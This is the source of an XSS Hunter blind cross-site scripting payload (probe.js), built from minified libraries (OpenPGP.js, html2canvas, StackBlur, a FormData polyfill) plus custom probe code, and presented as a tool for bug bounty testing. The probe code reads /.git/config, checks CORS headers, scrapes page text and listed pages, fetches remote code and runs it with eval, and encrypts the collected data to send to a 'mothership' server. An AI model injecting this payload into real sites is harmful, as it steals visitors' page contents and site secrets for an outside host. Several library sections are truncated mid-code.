xsshunter/probe.js

/*
$$$$$$\ $$\      $$\ $$$$$$$\   $$$$$$\  $$$$$$$\ $$$$$$$$\  $$$$$$\  $$\   $$\ $$$$$$$$\ $$\       
\_$$  _|$$$\    $$$ |$$  __$$\ $$  __$$\ $$  __$$\\__$$  __|$$  __$$\ $$$\  $$ |\__$$  __|$$ |      
  $$ |  $$$$\  $$$$ |$$ |  $$ |$$ /  $$ |$$ |  $$ |  $$ |   $$ /  $$ |$$$$\ $$ |   $$ |   $$ |      
  $$ |  $$\$$\$$ $$ |$$$$$$$  |$$ |  $$ |$$$$$$$  |  $$ |   $$$$$$$$ |$$ $$\$$ |   $$ |   $$ |      
  $$ |  $$ \$$$  $$ |$$  ____/ $$ |  $$ |$$  __$$<   $$ |   $$  __$$ |$$ \$$$$ |   $$ |   \__|      
  $$ |  $$ |\$  /$$ |$$ |      $$ |  $$ |$$ |  $$ |  $$ |   $$ |  $$ |$$ |\$$$ |   $$ |             
$$$$$$\ $$ | \_/ $$ |$$ |       $$$$$$  |$$ |  $$ |  $$ |   $$ |  $$ |$$ | \$$ |   $$ |   $$\       
\______|\__|     \__|\__|       \______/ \__|  \__|  \__|   \__|  \__|\__|  \__|   \__|   \__|      


$$$$$$$\  $$\                                               $$$$$$$\                            $$\ 
$$  __$$\ $$ |                                              $$  __$$\                           $$ |
$$ |  $$ |$$ | $$$$$$\   $$$$$$\   $$$$$$$\  $$$$$$\        $$ |  $$ | $$$$$$\   $$$$$$\   $$$$$$$ |
$$$$$$$  |$$ |$$  __$$\  \____$$\ $$  _____|$$  __$$\       $$$$$$$  |$$  __$$\  \____$$\ $$  __$$ |
$$  ____/ $$ |$$$$$$$$ | $$$$$$$ |\$$$$$$\  $$$$$$$$ |      $$  __$$< $$$$$$$$ | $$$$$$$ |$$ /  $$ |
$$ |      $$ |$$   ____|$$  __$$ | \____$$\ $$   ____|      $$ |  $$ |$$   ____|$$  __$$ |$$ |  $$ |
$$ |      $$ |\$$$$$$$\ \$$$$$$$ |$$$$$$$  |\$$$$$$$\       $$ |  $$ |\$$$$$$$\ \$$$$$$$ |\$$$$$$$ |
\__|      \__| \_______| \_______|\_______/  \_______|      \__|  \__| \_______| \_______| \_______|

This is a payload to test for Cross-site Scripting (XSS). It is meant to be used by security professionals and bug bounty hunters.

This is a self-hosted instance of XSS Hunter Express. It is not the same as the XSS Hunter website.
*/

// GPG encryption https://openpgpjs.org/
/*! OpenPGP.js v5.5.0 - 2022-08-31 - this is LGPL licensed code, see LICENSE/our website https://openpgpjs.org/ for more information. */
var openpgp=function(e){"use strict";const t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},r=Symbol("doneWritingPromise"),i=Symbol("doneWritingResolve"),n=Symbol("doneWritingReject"),a=Symbol("readingIndex");class s extends Array{constructor(){super(),this[r]=new Promise(((e,t)=>{this[i]=e,this[n]=t})),this[r].catch((()=>{}))}}function o(e){return e&&e.getReader&&Array.isArray(e)}function c(e){if(!o(e)){const t=e.getWriter(),r=t.releaseLock;return t.releaseLock=()=>{t.closed.catch((function(){})),r.call(t)},t}this.stream=e}s.prototype.getReader=function(){return void 0===this[a]&&(this[a]=0),{read:async()=>(await this[r],this[a]===this.length?{value:void 0,done:!0}:{value:this[this[a]++],done:!1})}},s.prototype.readToEnd=async function(e){await this[r];const t=e(this.slice(this[a]));return this.length=0,t},s.prototype.clone=function(){const e=new s;return e[r]=this[r].then((()=>{e.push(...this)})),e},c.prototype.write=async function(e){this.stream.push(e)},c.prototype.close=async function(){this.stream[i]()},c.prototype.abort=async function(e){return this.stream[n](e),e},c.prototype.releaseLock=function(){};const u="object"==typeof t.process&&"object"==typeof t.process.versions,h=u&&void 0;function f(e){return o(e)?"array":t.ReadableStream&&t.ReadableStream.prototype.isPrototypeOf(e)?"web":A&&A.prototype.isPrototypeOf(e)?"ponyfill":h&&h.prototype.isPrototypeOf(e)?"node":!(!e||!e.getReader)&&"web-like"}function d(e){return Uint8Array.prototype.isPrototypeOf(e)}function l(e){if(1===e.length)return e[0];let t=0;for(let r=0;r<e.length;r++){if(!d(e[r]))throw Error("concatUint8Array: Data must be in the form of a Uint8Array");t+=e[r].length}const r=new Uint8Array(t);let i=0;return e.forEach((function(e){r.set(e,i),i+=e.length})),r}const p=u&&void 0,y=u&&void 0;let b,m;if(y){b=function(e){let t=!1;return new A({start(r){e.pause(),e.on("data",(i=>{t||(p.isBuffer(i)&&(i=new Uint8Array(i.buffer,i.byteOffset,i.byteLength)),r.enqueue(i),e.pause())})),e.on("end",(()=>{t||r.close()})),e.on("error",(e=>r.error(e)))},pull(){e.resume()},cancel(r){t=!0,e.destroy(r)}})};class e extends y{constructor(e,t){super(t),this._reader=D(e)}async _read(e){try{for(;;){const{done:e,value:t}=await this._reader.read();if(e){this.push(null);break}if(!this.push(t)||this._cancelling){this._reading=!1;break}}}catch(e){this.emit("error",e)}}_destroy(e){this._reader.cancel(e)}}m=function(t,r){return new e(t,r)}}const g=new WeakSet,w=Symbol("externalBuffer");function v(e){if(this.stream=e,e[w]&&(this[w]=e[w].slice()),o(e)){const t=e.getReader();return this._read=t.read.bind(t),this._releaseLock=()=>{},void(this._cancel=()=>{})}let t=f(e);if("node"===t&&(e=b(e)),t){const t=e.getReader();return this._read=t.read.bind(t),this._releaseLock=()=>{t.closed.catch((function(){})),t.releaseLock()},void(this._cancel=t.cancel.bind(t))}let r=!1;this._read=async()=>r||g.has(e)?{value:void 0,done:!0}:(r=!0,{value:e,done:!1}),this._releaseLock=()=>{if(r)try{g.add(e)}catch(e){}}}v.prototype.read=async function(){if(this[w]&&this[w].length){return{done:!1,value:this[w].shift()}}return this._read()},v.prototype.releaseLock=function(){this[w]&&(this.stream[w]=this[w]),this._releaseLock()},v.prototype.cancel=function(e){return this._cancel(e)},v.prototype.readLine=async function(){let e,t=[];for(;!e;){let{done:r,value:i}=await this.read();if(i+="",r)return t.length?K(t):void 0;const n=i.indexOf("\n")+1;n&&(e=K(t.concat(i.substr(0,n))),t=[]),n!==i.length&&t.push(i.substr(n))}return this.unshift(...t),e},v.prototype.readByte=async function(){const{done:e,value:t}=await this.read();if(e)return;const r=t[0];return this.unshift(j(t,1)),r},v.prototype.readBytes=async function(e){const t=[];let r=0;for(;;){const{done:i,value:n}=await this.read();if(i)return t.length?K(t):void 0;if(t.push(n),r+=n.length,r>=e){const r=K(t);return this.unshift(j(r,e)),j(r,0,e)}}},v.prototype.peekBytes=async function(e){const t=await this.readBytes(e);return this.unshift(t),t},v.prototype.unshift=function(...e){this[w]||(this[w]=[]),1===e.length&&d(e[0]
/*! *****************************************************************************
  Copyright (c) Microsoft Corporation.

  Permission to use, copy, modify, and/or distribute this software for any
  purpose with or without fee is hereby granted.

  THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
  REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
  AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
  INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
  LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
  OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
  PERFORMANCE OF THIS SOFTWARE.
  ***************************************************************************** */function gd(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+t+" is not a constructor or null");function r(){this.constructor=e}md(e,t),e.prototype=null===t?Object.create(t):(r.prototype=t.prototype,new r)}function wd(e){if(!e)throw new TypeError("Assertion failed")}function vd(){}function _d(e){return"object"==typeof e&&null!==e||"function"==typeof e}function kd(e){if("function"!=typeof e)return!1;var t=!1;try{new e({start:function(){t=!0}})}catch(e){}return t}function Ad(e){return!!_d(e)&&"function"==typeof e.getReader}function Sd(e){return!!_d(e)&&"function"==typeof e.getWriter}function Ed(e){return!!_d(e)&&(!!Ad(e.readable)&&!!Sd(e.writable))}function Pd(e){try{return e.getReader({mode:"byob"}).releaseLock(),!0}catch(e){return!1}}function xd(e,t){var r=(void 0===t?{}:t).type;return wd(Ad(e)),wd(!1===e.locked),"bytes"===(r=Md(r))?new Rd(e):new Kd(e)}function Md(e){var t=e+"";if("bytes"===t)return t;if(void 0===e)return e;throw new RangeError("Invalid type is specified")}var Cd=function(){function e(e){this._underlyingReader=void 0,this._readerMode=void 0,this._readableStreamController=void 0,this._pendingRead=void 0,this._underlyingStream=e,this._attachDefaultReader()}return e.prototype.start=function(e){this._readableStreamController=e},e.prototype.cancel=function(e){return wd(void 0!==this._underlyingReader),this._underlyingReader.cancel(e)},e.prototype._attachDefaultReader=function(){if("default"!==this._readerMode){this._detachReader();var e=this._underlyingStream.getReader();this._readerMode="default",this._attachReader(e)}},e.prototype._attachReader=function(e){var t=this;wd(void 0===this._underlyingReader),this._underlyingReader=e;var r=this._underlyingReader.closed;r&&r.then((function(){return t._finishPendingRead()})).then((function(){e===t._underlyingReader&&t._readableStreamController.close()}),(function(r){e===t._underlyingReader&&t._readableStreamController.error(r)})).catch(vd)},e.prototype._detachReader=function(){void 0!==this._underlyingReader&&(this._underlyingReader.releaseLock(),this._underlyingReader=void 0,this._readerMode=void 0)},e.prototype._pullWithDefaultReader=function(){var e=this;this._attachDefaultReader();var t=this._underlyingReader.read().then((function(t){var r=e._readableStreamController;t.done?e._tryClose():r.enqueue(t.value)}));return this._setPendingRead(t),t},e.prototype._tryClose=function(){try{this._readableStreamController.close()}catch(e){}},e.prototype._setPendingRead=function(e){var t,r=this,i=function(){r._pendingRead===t&&(r._pendingRead=void 0)};this._pendingRead=t=e.then(i,i)},e.prototype._finishPendingRead=function(){var e=this;if(this._pendingRead){var t=function(){return e._finishPendingRead()};return this._pendingRead.then(t,t)}},e}(),Kd=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return gd(t,e),t.prototype.pull=function(){return this._pullWithDefaultReader()},t}(Cd);function Dd(e){return new Uint8Array(e.buffer,e.byteOffset,e.byteLength)}var Rd=function(e){function t(t){var r=this,i=Pd(t);return(r=e.call(this,t)||this)._supportsByob=i,r}return gd(t,e),Object.defineProperty(t.prototype,"type",{get:function(){return"bytes"},enumerable:!1,configurable:!0}),t.prototype._attachByobReader=function(){if("byob"!==this._readerMode){wd(this._supportsByob),this._detachReader();var e=this._underlyingStream.getReader({mode:"byob"});this._readerMode="byob",this._attachReader(e)}},t.prototype.pull=function(){if(this._supportsByob){var e=this._readableStreamController.byobRequest;if(e)return this._pullWithByobRequest(e)}return this._pullWithDefaultReader()},t.prototype._pullWithByobRequest=function(e){var t=this;this._attachByobReader();var r=new Uint8Array(e.view.byteLength),i=this._underlyingReader.read(r).then((function(r){var i,n,a;t._readableStreamController,r.done?(t._tryClose(),e.respond(0)):(i=r.value,n=e.view,a=Dd(i),Dd(n).set(a,0),e.respond(r.value.byteLength))}));return this._setPendingRead(i),i},t}(Cd);function Ud(e){wd(Sd(e))
//# sourceMappingURL=openpgp.min.js.map

// Blur canvas https://github.com/flozz/StackBlur
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).StackBlur={})}(this,(function(t){"use strict";function e(t){return(e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var r=[512,512,456,512,328,456,335,512,405,328,271,456,388,335,292,512,454,405,364,328,298,271,496,456,420,388,360,335,312,292,273,512,482,454,428,405,383,364,345,328,312,298,284,271,259,496,475,456,437,420,404,388,374,360,347,335,323,312,302,292,282,273,265,512,497,482,468,454,441,428,417,405,394,383,373,364,354,345,337,328,320,312,305,298,291,284,278,271,265,259,507,496,485,475,465,456,446,437,428,420,412,404,396,388,381,374,367,360,354,347,341,335,329,323,318,312,307,302,297,292,287,282,278,273,269,265,261,512,505,497,489,482,475,468,461,454,447,441,435,428,422,417,411,405,399,394,389,383,378,373,368,364,359,354,350,345,341,337,332,328,324,320,316,312,309,305,301,298,294,291,287,284,281,278,274,271,268,265,262,259,257,507,501,496,491,485,480,475,470,465,460,456,451,446,442,437,433,428,424,420,416,412,408,404,400,396,392,388,385,381,377,374,370,367,363,360,357,354,350,347,344,341,338,335,332,329,326,323,320,318,315,312,310,307,304,302,299,297,294,292,289,287,285,282,280,278,275,273,271,269,267,265,263,261,259],n=[9,11,12,13,13,14,14,15,15,15,15,16,16,16,16,17,17,17,17,17,17,17,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24];function a(t,r,n,a,o){if("string"==typeof t&&(t=document.getElementById(t)),!t||"object"!==e(t)||!("getContext"in t))throw new TypeError("Expecting canvas with `getContext` method in processCanvasRGB(A) calls!");var i=t.getContext("2d");try{return i.getImageData(r,n,a,o)}catch(t){throw new Error("unable to access image data: "+t)}}function o(t,e,r,n,o,f){if(!(isNaN(f)||f<1)){f|=0;var g=a(t,e,r,n,o);g=i(g,e,r,n,o,f),t.getContext("2d").putImageData(g,e,r)}}function i(t,e,a,o,i,f){for(var g,l=t.data,c=2*f+1,s=o-1,v=i-1,b=f+1,x=b*(b+1)/2,d=new u,y=d,h=1;h<c;h++)y=y.next=new u,h===b&&(g=y);y.next=d;for(var p=null,m=null,w=0,B=0,C=r[f],E=n[f],I=0;I<i;I++){y=d;for(var S=l[B],N=l[B+1],R=l[B+2],D=l[B+3],G=0;G<b;G++)y.r=S,y.g=N,y.b=R,y.a=D,y=y.next;for(var T=0,j=0,A=0,W=0,k=b*S,H=b*N,_=b*R,M=b*D,O=x*S,P=x*N,q=x*R,z=x*D,F=1;F<b;F++){var J=B+((s<F?s:F)<<2),K=l[J],L=l[J+1],Q=l[J+2],U=l[J+3],V=b-F;O+=(y.r=K)*V,P+=(y.g=L)*V,q+=(y.b=Q)*V,z+=(y.a=U)*V,T+=K,j+=L,A+=Q,W+=U,y=y.next}p=d,m=g;for(var X=0;X<o;X++){var Y=z*C>>E;if(l[B+3]=Y,0!==Y){var Z=255/Y;l[B]=(O*C>>E)*Z,l[B+1]=(P*C>>E)*Z,l[B+2]=(q*C>>E)*Z}else l[B]=l[B+1]=l[B+2]=0;O-=k,P-=H,q-=_,z-=M,k-=p.r,H-=p.g,_-=p.b,M-=p.a;var $=X+f+1;$=w+($<s?$:s)<<2,O+=T+=p.r=l[$],P+=j+=p.g=l[$+1],q+=A+=p.b=l[$+2],z+=W+=p.a=l[$+3],p=p.next;var tt=m,et=tt.r,rt=tt.g,nt=tt.b,at=tt.a;k+=et,H+=rt,_+=nt,M+=at,T-=et,j-=rt,A-=nt,W-=at,m=m.next,B+=4}w+=o}for(var ot=0;ot<o;ot++){var it=l[B=ot<<2],ft=l[B+1],gt=l[B+2],ut=l[B+3],lt=b*it,ct=b*ft,st=b*gt,vt=b*ut,bt=x*it,xt=x*ft,dt=x*gt,yt=x*ut;y=d;for(var ht=0;ht<b;ht++)y.r=it,y.g=ft,y.b=gt,y.a=ut,y=y.next;for(var pt=o,mt=0,wt=0,Bt=0,Ct=0,Et=1;Et<=f;Et++){B=pt+ot<<2;var It=b-Et;bt+=(y.r=it=l[B])*It,xt+=(y.g=ft=l[B+1])*It,dt+=(y.b=gt=l[B+2])*It,yt+=(y.a=ut=l[B+3])*It,Ct+=it,mt+=ft,wt+=gt,Bt+=ut,y=y.next,Et<v&&(pt+=o)}B=ot,p=d,m=g;for(var St=0;
//# sourceMappingURL=stackblur.min.js.map


// FormData polyfill https://github.com/jimmywarting/FormData
if("undefined"!=typeof Blob&&("undefined"==typeof FormData||!FormData.prototype.keys)){const e="object"==typeof globalThis?globalThis:"object"==typeof window?window:"object"==typeof self?self:this,t=e.FormData,n=e.XMLHttpRequest&&e.XMLHttpRequest.prototype.send,o=e.Request&&e.fetch,a=e.navigator&&e.navigator.sendBeacon,s=e.Element&&e.Element.prototype,r=e.Symbol&&Symbol.toStringTag;r&&(Blob.prototype[r]||(Blob.prototype[r]="Blob"),"File"in e&&!File.prototype[r]&&(File.prototype[r]="File"));try{new File([],"")}catch(t){e.File=function(e,t,n){const o=new Blob(e,n),a=n&&void 0!==n.lastModified?new Date(n.lastModified):new Date;return Object.defineProperties(o,{name:{value:t},lastModifiedDate:{value:a},lastModified:{value:+a},toString:{value:()=>"[object File]"}}),r&&Object.defineProperty(o,r,{value:"File"}),o}}function normalizeValue([e,t,n]){return t instanceof Blob&&(t=new File([t],n,{type:t.type,lastModified:t.lastModified})),[e,t]}function ensureArgs(e,t){if(e.length<t)throw new TypeError(`${t} argument required, but only ${e.length} present.`)}function normalizeArgs(e,t,n){return t instanceof Blob?[String(e),t,void 0!==n?n+"":"string"==typeof t.name?t.name:"blob"]:[String(e),String(t)]}function normalizeLinefeeds(e){return e.replace(/\r\n/g,"\n").replace(/\n/g,"\r\n")}function each(e,t){for(let n=0;n<e.length;n++)t(e[n])}class i{constructor(e){this._data=[];const t=this;e&&each(e.elements,e=>{if(e.name&&!e.disabled&&"submit"!==e.type&&"button"!==e.type&&!e.matches("form fieldset[disabled] *"))if("file"===e.type){each(e.files&&e.files.length?e.files:[new File([],"",{type:"application/octet-stream"})],n=>{t.append(e.name,n)})}else if("select-multiple"===e.type||"select-one"===e.type)each(e.options,n=>{!n.disabled&&n.selected&&t.append(e.name,n.value)});else if("checkbox"===e.type||"radio"===e.type)e.checked&&t.append(e.name,e.value);else{const n="textarea"===e.type?normalizeLinefeeds(e.value):e.value;t.append(e.name,n)}})}append(e,t,n){ensureArgs(arguments,2),this._data.push(normalizeArgs(e,t,n))}delete(e){ensureArgs(arguments,1);const t=[];e=String(e),each(this._data,n=>{n[0]!==e&&t.push(n)}),this._data=t}*entries(){for(var e=0;e<this._data.length;e++)yield normalizeValue(this._data[e])}forEach(e,t){ensureArgs(arguments,1);for(const[n,o]of this)e.call(t,o,n,this)}get(e){ensureArgs(arguments,1);const t=this._data;e=String(e);for(let n=0;n<t.length;n++)if(t[n][0]===e)return normalizeValue(t[n])[1];return null}getAll(e){ensureArgs(arguments,1);const t=[];return e=String(e),each(this._data,n=>{n[0]===e&&t.push(normalizeValue(n)[1])}),t}has(e){ensureArgs(arguments,1),e=String(e);for(let t=0;t<this._data.length;t++)if(this._data[t][0]===e)return!0;return!1}*keys(){for(const[e]of this)yield e}set(e,t,n){ensureArgs(arguments,2),e=String(e);const o=[],a=normalizeArgs(e,t,n);let s=!0;each(this._data,t=>{t[0]===e?s&&(s=!o.push(a)):o.push(t)}),s&&o.push(a),this._data=o}*values(){for(const[,e]of this)yield e}_asNative(){const e=new t;for(const[t,n]of this)e.append(t,n);return e}_blob(){const e="----formdata-polyfill-"+Math.random(),t=[];for(const[n,o]of this)t.push(`--${e}\r\n`),o instanceof Blob?t.push(`Content-Disposition: form-data; name="${n}"; filename="${o.name}"\r\n`+`Content-Type: ${o.type||"application/octet-stream"}\r\n\r\n`,o,"\r\n"):t.push(`Content-Disposition: form-data; name="${n}"\r\n\r\n${o}\r\n`);return t.push(`--${e}--`),new Blob(t,{type:"multipart/form-data; boundary="+e})}[Symbol.iterator](){return this.entries()}toString(){return"[object FormData]"}}if(s&&!s.matches&&(s.matches=s.matchesSelector||s.mozMatchesSelector||s.msMatchesSelector||s.oMatchesSelector||s.webkitMatchesSelector||function(e){for(var t=(this.document||this.ownerDocument).querySelectorAll(e),n=t.length;--n>=0&&t.item(n)!==this;);return n>-1}),r&&(i.prototype[r]="FormData"),n){const t=e.XMLHttpRequest.prototype.setRequestHeader;e.XMLHttpRequest.prototype.setRequestHeader=function(e,n){t.call(this,e,n),"content-type"===e.toLowerCase()&&(this._hasContentType=!0)},e.XMLHttpRequest.prototype.send=function(e){if(e instanceof i){const t=e._blob();thi

// https://github.com/niklasvh/html2canvas
/*!
 * html2canvas 1.4.1 <https://html2canvas.hertzen.com>
 * Copyright (c) 2022 Niklas von Hertzen <https://hertzen.com>
 * Released under MIT License
 */
!function(A,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(A="undefined"!=typeof globalThis?globalThis:A||self).html2canvas=e()}(this,function(){"use strict";
/*! *****************************************************************************
    Copyright (c) Microsoft Corporation.

    Permission to use, copy, modify, and/or distribute this software for any
    purpose with or without fee is hereby granted.

    THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
    REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
    AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
    INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
    LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
    OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
    PERFORMANCE OF THIS SOFTWARE.
    ***************************************************************************** */var r=function(A,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(A,e){A.__proto__=e}||function(A,e){for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(A[t]=e[t])})(A,e)};function A(A,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function t(){this.constructor=A}r(A,e),A.prototype=null===e?Object.create(e):(t.prototype=e.prototype,new t)}var h=function(){return(h=Object.assign||function(A){for(var e,t=1,r=arguments.length;t<r;t++)for(var B in e=arguments[t])Object.prototype.hasOwnProperty.call(e,B)&&(A[B]=e[B]);return A}).apply(this,arguments)};function a(A,s,o,i){return new(o=o||Promise)(function(t,e){function r(A){try{n(i.next(A))}catch(A){e(A)}}function B(A){try{n(i.throw(A))}catch(A){e(A)}}function n(A){var e;A.done?t(A.value):((e=A.value)instanceof o?e:new o(function(A){A(e)})).then(r,B)}n((i=i.apply(A,s||[])).next())})}function H(t,r){var B,n,s,o={label:0,sent:function(){if(1&s[0])throw s[1];return s[1]},trys:[],ops:[]},A={next:e(0),throw:e(1),return:e(2)};return"function"==typeof Symbol&&(A[Symbol.iterator]=function(){return this}),A;function e(e){return function(A){return function(e){if(B)throw new TypeError("Generator is already executing.");for(;o;)try{if(B=1,n&&(s=2&e[0]?n.return:e[0]?n.throw||((s=n.return)&&s.call(n),0):n.next)&&!(s=s.call(n,e[1])).done)return s;switch(n=0,(e=s?[2&e[0],s.value]:e)[0]){case 0:case 1:s=e;break;case 4:return o.label++,{value:e[1],done:!1};case 5:o.label++,n=e[1],e=[0];continue;case 7:e=o.ops.pop(),o.trys.pop();continue;default:if(!(s=0<(s=o.trys).length&&s[s.length-1])&&(6===e[0]||2===e[0])){o=0;continue}if(3===e[0]&&(!s||e[1]>s[0]&&e[1]<s[3])){o.label=e[1];break}if(6===e[0]&&o.label<s[1]){o.label=s[1],s=e;break}if(s&&o.label<s[2]){o.label=s[2],o.ops.push(e);break}s[2]&&o.ops.pop(),o.trys.pop();continue}e=r.call(t,o)}catch(A){e=[6,A],n=0}finally{B=s=0}if(5&e[0])throw e[1];return{value:e[0]?e[1]:void 0,done:!0}}([e,A])}}}function t(A,e,t){if(t||2===arguments.length)for(var r,B=0,n=e.length;B<n;B++)!r&&B in e||((r=r||Array.prototype.slice.call(e,0,B))[B]=e[B]);return A.concat(r||e)}var d=(B.prototype.add=function(A,e,t,r){return new B(this.left+A,this.top+e,this.width+t,this.height+r)},B.fromClientRect=function(A,e){return new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height)},B.fromDOMRectList=function(A,e){e=Array.from(e).find(function(A){return 0!==A.width});return e?new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height):B.EMPTY},B.EMPTY=new B(0,0,0,0),B);function B(A,e,t,r){this.left=A,this.top=e,this.width=t,this.height=r}for(var f=function(A,e){return d.fromClientRect(A,e.getBoundingClientRect())},Q=function(A){for(var e=[],t=0,r=A.length;t<r;){var B,n=A.charCodeAt(t++);55296<=n&&n<=56319&&t<r?56320==(64512&(B=A.charCodeAt(t++)))?e.push(((1023&n)<<10)+(1023&B)+65536):(e.push(n),t--):e.push(n)}return e},g=function(){for(var A=[],e=0;e<arguments.length;e++)A[e]=arguments[e];if(String.fromCodePoint)return String.fromCodePoint.apply(String,A);var t=A.length;if(!t)return"";for(var r=[],B=-1,n="";++B<t;){var s=A[B];s<=65535?r.push(s):(s-=65536,r.push(55296+(s>>10),s%1024+56320)),(B+1===t||16384<r.length)&&(n+=String.fromCharCode.apply(String,r),r.length=0)}return n},e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",n="undefined"==typeof Uint8Array?[]:new Uint8Array(256),s=0;s<e.length;s++)n[e.charCodeAt(s)]=s;for(var o="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",c="undefined"==typeof Uint8Array?[]:new Uint8Array(256),i=0;i<o.length;i++)c[o.charCodeAt(i)]=i;function w(A,e,t){return A.slice?A.slice(e,t):new Uint16Array(Array.prototype.slice.call(A,e,t))}var U=(l.prototype.get=function(A){var e;if(0<=A){if(A<55296||56319<A&&A<=65535)return e=this.index[A>>5],this.data[e=(e<<2)+(31&A)];if(A<=65535)return e=this.index[2048+(A-55296>>5)],this.data[e=(e<<2)+(31&A)];if(A<this.highStart)return e=this.index[e=2080+


var chainload_uri = [CHAINLOAD_REPLACE_ME];
var collect_page_list = [COLLECT_PAGE_LIST_REPLACE_ME]

// Source: https://stackoverflow.com/a/20151856/1195812
function base64_to_blob(base64Data, contentType) {
    contentType = contentType || '';
    var sliceSize = 1024;
    var byteCharacters = atob(base64Data);
    var bytesLength = byteCharacters.length;
    var slicesCount = Math.ceil(bytesLength / sliceSize);
    var byteArrays = new Array(slicesCount);

    for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
        var begin = sliceIndex * sliceSize;
        var end = Math.min(begin + sliceSize, bytesLength);

        var bytes = new Array(end - begin);
        for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
            bytes[i] = byteCharacters[offset].charCodeAt(0);
        }
        byteArrays[sliceIndex] = new Uint8Array(bytes);
    }
    return new Blob(byteArrays, { type: contentType });
}

let pgp_encrypt = async function(publicKeyArmored, data) {
    // put keys in backtick (``) to avoid errors caused by spaces or tabs
    const publicKey = await openpgp.readKey({ armoredKey: publicKeyArmored });

    const encrypted = await openpgp.encrypt({
        message: await openpgp.createMessage({ text: data }), // input as Message object
        encryptionKeys: publicKey,
    });
    return encrypted; // '-----BEGIN PGP MESSAGE ... END PGP MESSAGE-----'
};



let check_cors = async function(){
    let res = await fetch("", {method: 'HEAD'})
    for (const header of res.headers){
        if (header[0].toLowerCase() == "access-control-allow-origin"){
            return header[1];
        }
    }
    return false
}

let check_git = async function(){

    let res = await fetch("/.git/config");
    let text = await res.text();
    if (text.startsWith("[core]")){
        return text
    }
    return false
}

function get_guid() {
    var S4 = function() {
       return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
    };
    return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4());
}

function never_null( value ) {
    if( value !== undefined ) {
        return value;
    } else {
        return '';
    }
}

function collect_pages(pgp_key) {
    for( var i = 0; i < collect_page_list.length; i++ ) {
        // Make sure the path is correctly formatted
        if( collect_page_list[i].charAt(0) != "/" ) {
            collect_page_list[i] = "/" + collect_page_list[i];
        }
        collect_page_data( collect_page_list[i], pgp_key );
    }
}

function eval_remote_source( uri ) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if ( xhr.readyState == XMLHttpRequest.DONE ) {
            eval( xhr.responseText );
        }
    }
    xhr.open( 'GET', uri, true );
    xhr.send( null );
}

function addEvent(element, eventName, fn) {
    if (element.addEventListener)
        element.addEventListener(eventName, fn, false);
    else if (element.attachEvent)
        element.attachEvent('on' + eventName, fn);
}

function get_dom_text() {
	var text_extractions_to_try = [
		document.body.outerText,
		document.body.innerText,
		document.body.textContent,
	];
	for(var i = 0; i < text_extractions_to_try.length; i++) {
		if(typeof text_extractions_to_try[i] === 'string') {
			return text_extractions_to_try[i];
		}
	}

	return '';
}

function generate_random_string(length) {
	var return_array = [];
	var characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	var charactersLength = characters.length;
	for (var i = 0; i < length; i++) {
		return_array.push(characters.charAt(Math.floor(Math.random() * charactersLength)));
	}
	return return_array.join("");
}

let contact_mothership = async function(probe_return_data, pgp_key) {
	var form_data = new FormData();
